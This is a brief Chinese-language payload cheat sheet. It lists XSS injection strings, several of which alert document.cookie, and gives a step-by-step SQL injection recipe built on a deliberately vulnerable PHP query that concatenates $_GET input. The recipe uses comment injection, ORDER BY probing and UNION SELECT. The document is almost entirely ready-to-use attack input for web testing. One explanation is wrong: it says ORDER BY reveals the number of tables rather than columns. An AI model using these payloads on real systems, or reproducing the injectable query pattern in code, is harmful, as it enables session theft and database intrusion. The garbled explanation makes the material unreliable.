XSS测试用例
'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<script>alert('Vulnerable');</script> 
<script>alert('Vulnerable')</script> 
?sql_debug=1 
a%5c.aspx 
a.jsp/<script>alert('Vulnerable')</script> 
a/ 
a?<script>alert('Vulnerable')</script> 
"><script>alert('Vulnerable')</script> 


Sql注入用例：

$sql = "SELECT * FROM users where name='root' and 1=1 #";
$sql .= $_GET["name"]."'";  
$result = mysql_query($sql)
?name=root' and 1=1 #
根据获得的#编码来进行以下的操作，假设#编码是%23
?name=root' order by 5 %23
更改5成任意的数字，知道其中有一个数字时正常，就得到有多少个表
假设有五个表，那么就可以使用以下语句判断有多少个注入点
?name=root' and 1=2 UNION SELECT 1,2,3,4,5 %23

